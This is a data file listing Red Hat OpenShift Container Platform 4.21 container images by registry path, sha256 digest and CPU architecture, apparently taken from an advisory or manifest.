"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:d4b99966cb1cdf067d73eab6074f42203f65c0a10c78ef3b16f7deae78e21b94_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9cb8a702b78977cc3a6e5418210d15a0d431fa56c217cfd8b5f69653d6acb89d_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:a5f93ba58c76c1d26d44bbe14a70d4cfb07e7edd9401bee47da3ce2abc435bc1_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:ba11e45b58a6c4940f40f11c0d47129571103de5883d4ccf22b6ba5b9ccdb9b4_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:fc95a3a095e63ec33e95a638dae9f529583c054cbdc3dacf1b90d1e10f35bea3_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:299f374419ceec56c49dc130fc4052bb7140be28f23b6f5b414607bc8ad4a805_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:414f0b86c4940ad7a5ca443bf04ff8293f93804d8b69688382e177afa1459394_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:b96362fcb7b09af38eed2bd77d8720fe128a4c677d3a5d46dbe3b09412fd1fd5_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:e207c502258c60ca9fbe42ecaf9ab005dd7ba3d9b76566b6a92756fc73b6968e_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:1a22a625e67c26e4db67b97a3e08fe63a1ed931e419b732fb186567ab5c2edd7_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:42396c0e20ce9c8afbfb8c87b80e1b48b0695118a583b1e107f07bae9ead7614_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:46afc0e9d2c34fbcb000ed2ac59c393aa4160944bf083b4b4ef7f09a73c77023_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:903ed233bcf6493cca231fe024bda6085f9dda1052783e5f8daa8d5c35b6652f_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:b3747aca163af2713256a975222f6dac10692a5b99ef948bb8e4471532e4e484_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:cb27bf3938c353f8ed8138c5c650be7e72ee2e9d6b14e998eaa2e39db18fe3ed_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:fef2fda5b7fde7cae7b32d63507fe61ffcc74632e7c5170146f9afa5d827a359_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:ff132632ffb2f87746e79787cac21fba12a9862a707885dbe9ccf95f2b388941_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:15399cbb6b6adc9ec25f1174ad8e04f5c5f5bf0b02d4ee7023b4f38e810aca03_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:51b7944a69371c67883a6decf075013feb4cea80258fc0927176fa824c98cf2f_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:b24d5a179400093a2a61b87f3c0dbd8d1f1f91e8fcb288e18f87ef5fe8bd6a4c_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:e8aa91667479746a74f25506fcdaa4b639b947d73a77af49f2b945f93e2fdb46_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:1782aa4b09b78512885d81c529588737d738cf29def3ff2542e74fd02d256cf2_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:66e02bf9c48cac8edb441d20fc8bcf3f57af58d13b9bc65e7337592e466592c3_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:c9f28ea22ec8ebfecd5af2d0369ed023b6f9d4e3413e3ad6048aeebb124ede5f_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:ccd9f2be0df364b640b1e2b8b470bb9a536222383734258e4917bcc0adddec38_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:03747941ed41fbe46a4eea27ccedfde73d5cb56d7da3e6bd58c0591800014e3c_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:725ba6da6b823755b419f3fa21abd83b3b8bfbda87a0ebe95cd1154afdd5edca_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:b6d1aa1c4d291f0e581185ac425a900961f2a01b73481f004607e0918af0aaad_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:bfc8fbbd5e342e4e801d576913b0a6a9c41150c0a091eb43d0886a18f3a22f17_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:63f0b1ba5c3947e640911e31b9032bce1b7e3cffd16574158a67a9d8bfbb52d1_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:9a0291c1d482cc75b5da3b61ea6cb240bae63c7f7bae7ca5d6ef9cdd30233432_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:d8fcb99e70b38b22fe131df90326e000e0cda91f206468ad06d4e8ebecc323a0_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:e44e5b2f803f9c0e0003b5832fbb90a80c9e35a36ff524cfbe04b00d18dd9aad_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:0628f21ae749dad21df82d4375448da03b3556d8cfa3411a91d7693ee050635f_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:33b125caf8101d10e87c75d960666659dc64ecb8c9cc15c39049f82b174a2b03_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:3be19f58c31be0655db45e701bd9852a07ae1fda287301fa8218f2ef56c2ee55_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:99153879eb97320f2d86b6af296540250f7e234f847a01bc3d0ab50e509918a9_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:0e4945c40c683253f210a354ab1b52cfaae5fb3c844b47f391c1cdaa9fe170a0_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:16ebabf0329c1fa4104b3f3d244c3b3e54ff6b7f747b092b66e3ef2b4d79216f_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:200cc383245287f696fd5c0c6bf63b2bfb96c4e27e8fa46f7938b49af2e40f94_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:5cf69f239d585f936caca1ea97ec5870e6fdfcfee2fdf83984d40e371fa31180_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:31946984af1316d14937792eb39335d8effa5774fc5c28200d770d48117ce492_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:b39be2a08e43aef9897cc7a3d411d9ad6b8037cfed852e916e57d0346ac7e675_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:c82aa35aff9a2feda3598f7a1d84a7b7b78736af05dbeccdac3a5d2600d6cbb5_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:fda1392b4de1ec066e6e816968c6a5af8fe4f33a9dd81216dcac8f34c5824010_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:2a75be0f5104de3c9b587e92dd8e266d7d54c278b8c15321b377ca6ad7636cf0_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:33929a52af39ae582e1c19c4b3598b0b1d83669aed27faa42fdad73798d7b4bc_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:70f1339b43a7a2ffa55e8128782dbf02308e74e7f3b71e93e498a8fc841bae68_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:ac058f6d264bc7ce4ae8ffdc63c30eff96ccb2ea8c3b896a761d4acfc41c685b_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:67a5c7868876aa2532948aabd3169bad5b43d278fb72bbc3c7996166605a61a5_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:7df58145a95adeb913b9cbca82da8ae856a10b3de5ed25e170fd7af9c80afdd7_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:841b26747f8ecaf1056d4737bd1c3f3646d6879ed8a01f28093325e4945c2a2b_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:b26b53b427eedb66b64ee766ac8d8915a2e9b4c4d370684c8215fe44a5fe078a_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:0c6fbdff8409ec28cb25730648b32d08787a25e422273635ffcfc12df4adcef9_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:2fe70ff939d25ac7ef7809fe566015398423d236276a342dd48df66e690a775d_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:84672d5c16e192f5b5919577cbef7098cc4d19be1af37d2a40dce1a162e7dce7_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:b0ab000dbe5818bd25853a4917cf7eb8e4d56c228837747f42361fa3ba3e321e_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:176d9b8a630e5614f993712266130175fa393b7fa4706a9e0d4e965343864b37_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:477d28c93d7405520951ab1c64f172b66ab4834462e21e8d8f7d1892adde954a_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:63a534489c093862945a6215eca0dcae4f7e738414d8840a7962d4604d6dcdb3_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:e8a14458a2580a5d8e9719e38fcfad7dcaea488533866d3c784d171383278985_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:0d9579b0b3b9cd657ae69826fefc91d37a609663940aa7d78f403dcb67db7649_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:46eddf2c3239c92218286368ced60b42cea6f789a09ab9981f0e6fbd216cb1f6_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:6f5d819b8b433e84c4bb7c41a6a31f1265be15ccbb13a0605d0dc16d718904de_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:eddd9cd258d32f1743547c9d8f5fe46e91365511c5c49cfefe626e8d546790cb_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:2561fb021083a53e1a38cb951c2f64dff98bb327ba85e8423668ac01f86b9422_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:762abf08666427b5aa8c7d7da94508e223a19a106e551615db8d12ecdb05a680_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:f0486f64952ca6ee97c723f62cfce9e41b1a3163afce6e856e6218db81aab416_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:fd158e43b890938b51004b960a9c753e644045880b3becb92df373fb91fe94b5_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:03906fb92943c8529cfe1e466bec8f8daf8e41981d98dd0dd8470dc2881d44fe_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:5a07998a9b00be6bb0dadefe6bd58399101ee349ac7e4438bbb52401f0e6d9ad_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:7d05b9ae8a423cce1ed3ca14e7373992d63ec40508417dc41eb3ecf3908e57ce_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:edad8eacc5e578c88d5dafef41dac47f97644c30cf15cf79a95db1e97fe90386_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:599e98f170baae773a5ce6f61ead9afd0c9bdda0e5ff6d8245b70f49bb29c050_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:855715feeb8d159042543e0fa39ae9f9ae0c93fef38369929cdf55bef7345479_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:ae0697af7ccf9c43e5dc5f1f0402beedec91d935d27058b8f69be65f02a491b4_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:ccac24ab41981b3f052f3cb765e5adec77ca584dbe82272243c846c7f6953064_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:119755cb13662c0badea9909769b6d1b68e39ae301528e2d02033fadafb3ada7_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:4ab8f0bae412a02716488ba4cdb98484f1ce8a02af2a57268325ec3fcf71a68e_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:4fb910203a55e68b0808e3bc0ff4810415cdd1bc11797419fbb7fdbc207902bd_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:5f60cd059fc10cc44b69ae22f112a1ee417caa80c1cc24244305b4a0d9cd3770_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:243198fd33b89359085ce6a81105a4f0994b4a4108bf14939c79925e22b21f10_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:5dc47b4cb13f136785a96251bdc04660378782ecb2402c3b97088ae1e06bcc81_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:671255acd29d7a45fbfe17fb5108065472197ba6ad1edaf57dd071bc471ab8c6_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:ca2c0901f0ec1756344b5029e2912d6d7bd60c91015dbdf8b9ed704a2f59f6c0_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:83a3fd64a6dc406e9035cdd58a98f7e745919ae3b44d9fbe4bc1087f36ace997_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:87de8c9f5d7d591609208ab4332efa976b4ed303dd18f879374f2d047c9b8c9f_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:bb4acaac924d3e5b90306927a9d1e848c656f2a3e3572f59c163cbdab2f96980_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:f70ed49c97be6bec1394cc8a7476bdc694d2a9222fcd63079bf6e27af8f6b465_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:00f27b950067e2221e7ec3d2b050939239d5521352a2496e152092d043588190_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:2973ce1c3d9df0e94568fdc45b90f86d6d7c65fa3bf6c319219b9e213a684101_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:3901b52ff993fc282bbea1b9b809a75da85fa70fc4d85690fed3d23922218722_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:71eedc67a3a1641b7dda0b7974b82dee449e7ee4efa5a4745042efbf32795898_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:7d76c0f6f94b38c24f37c80c88f4c343792a63765d741c3c8c6c930cdb949349_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:7effee7b85d83c6fbf210c0b7dc5bc4bf9d1a218c2e0d847c7bfd4b205dd8a74_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:d3971e090065233100d9c842b116a8abed46852cf16fe23c6a02601c6898471d_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:f54b6da4bb411f5fdeec587f959111281be96f9652076c9fe913dde3e0942216_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:01dcdeb5283cdeb0ddba574048f39ef56f2a2f548efffffd3984bbf29d20cd81_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:17508a3579649b2f104c177ff20decf1792214307cdfd81679075afd2287f266_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:203b0b4d925bd77ae87f65636286e232186d8d4583b4db054cfcd8a6bb5550c7_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:ac0a240e28bcd757bf17b7c394ce29039bce95933ef903512257fc77d5a563da_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:0b4342a45f1bff331108e760c7022aa89baa9f57203638560500cbb2c223e8da_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:2bd38ca9b26cfa801fa8953d3498ddeada823e50f421f9061dbbf1ba77d72d18_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:d23fea2bd893beb50feb76ea14c8674a721085694bc584f702f8ded1dc1aa7b1_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:da24b2db5c1cf99b9910abba7846c7301e1ae4fa9fa5e99e639b7840d1d53a81_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:12f808f0c0a7103699e60487369cc7e4938098c9e8844c192e957fcd564f7fd3_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:8ea2c228f0d91c6e1d86cf11676e9e10d55785850aacc3d5c26c88838c6e5e6b_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:c0936e2cd743f59b3b7d49c8a915503f06721578ad44f3884f547278637eb83e_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:c9db60882b0128f4590e519fe1743e24016c39610141e62aa0433c2ec0a007b8_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:1c12e3a479c1b9151399bd607251cd363c53d258aebbde16d9f445bf762b5c5e_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:55cb1bfa110d67c2452259e6b4a2158b8f6e7c4bba9e7dfd661e0dea37ff2e25_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:99fc6f28b728c227ac8fb8b0dce24369168c7c1aa470778953b30e7fb0ecd1dc_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:e77e4ba2ca054937f43d56ea54ed53df29fb55179879064a83ab078660c6c9f7_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-console-rhel9@sha256:9c77d337f175a9ae409943abbbe952a6c738f6ea7f35f0108b338501f7454bb4_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-console-rhel9@sha256:aca9a52fb5a895ab113232b967887b942882b83e0e8902c269214df95173a386_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-console-rhel9@sha256:f74d2a1cde5b1ad9da59a8ecd9b81f86aae535ec800c116bb3d160fb81961ba4_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-console-rhel9@sha256:fdcf40f0405b01b5e02f2ec83b5bdbeb374294f0041a97007d430c3c4109573c_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:64d0b8bb7edbe154290b673c995576311b6d0afa28c43503788796c5f7e6451e_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:aad763544d16ba5a83b072093e775808c09f75f75a9a090c6d92a6a7b825ee69_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:bc41319e164e78b324afc58f901a74ac57dbda40bcec111adbfd3341f23d99ac_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:c6239025da97af64f8edc0451e856f716b30b6524f2b85b58fc2495d3d324ca3_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:26d93d9c3f7d1062352b9a3c8fc310493b82a992fbaee507f2acd89a25af9817_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:37108a8ac0e5f8284600cfaf82464ca52003565a2a2f2c88063b88ca5bf51d96_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:b407d2fd2856dcec89ab84290158a5bd6c137930fc6f50ede20955d7b01c3aa2_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:c8fe680b1a191adfcce2a63df567dbe0c9a8eb29e627d58a396dba2087b8e25d_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:5e34c5fe7eb76d49ef6a3d0f51d992027a1eb03d2bb19849101e06f1c5712c0c_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:caaa046579e45eb9fd04e0ccaf4626dc996821dd2c285c98f817aafd4ff5699a_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:bb5390b5c793399187217ba40659b86e9de4a301fe555c630a41a198d0e36bdb_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:f7826f13f5ddd0da5388b0122164cc20f00f18d5c6e7ded86c600d09e75f23e4_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:bf37d0ca7770e6609c5c746e13d5a44c38162f6d5e9892de2aeee29cf152236b_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:f3efff725f2e8a8a771f0fd6632819d69335da62c57a6da55b2aba08ec3d08a5_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:052ee53314fff6d49caa1b52be80c90f4a81bdfd9b0f27ed6c2a5cf4e260ef33_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:1dfaae34d94c83c0980ad92ab74ee4e60b727a7bdb6e671dc5a99b907bb33ddd_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:38e460f96e25cf1d13a7092fa9b9aa5f0b61b30217f5ffcabdec78e1fb8215f3_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:be1d0b6e6b3d11f0028bd8e17f6fa5f948472ae1664a08ddb27c325137e4c013_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:1b31ce33a1c3710bfc248e76293ed88a8eb9a250b5bd8ec39706bd54d19e3eba_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:34f242c441b8c550a655ac872ae8c9b97ad417e82b7c46b865f93c5b5ec75a42_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:41e352ba9ad323ac14abd8e9f49a942cedb89b0f16b0e21e4773070c46cf01ba_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:9bb667960a8f888be2bcee6a24688bb30200990775dce499ad94b0137174609f_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:7980c446d0b882444418d1c3dd89be448124b9d58d94a19951c534193e26a242_s390x",
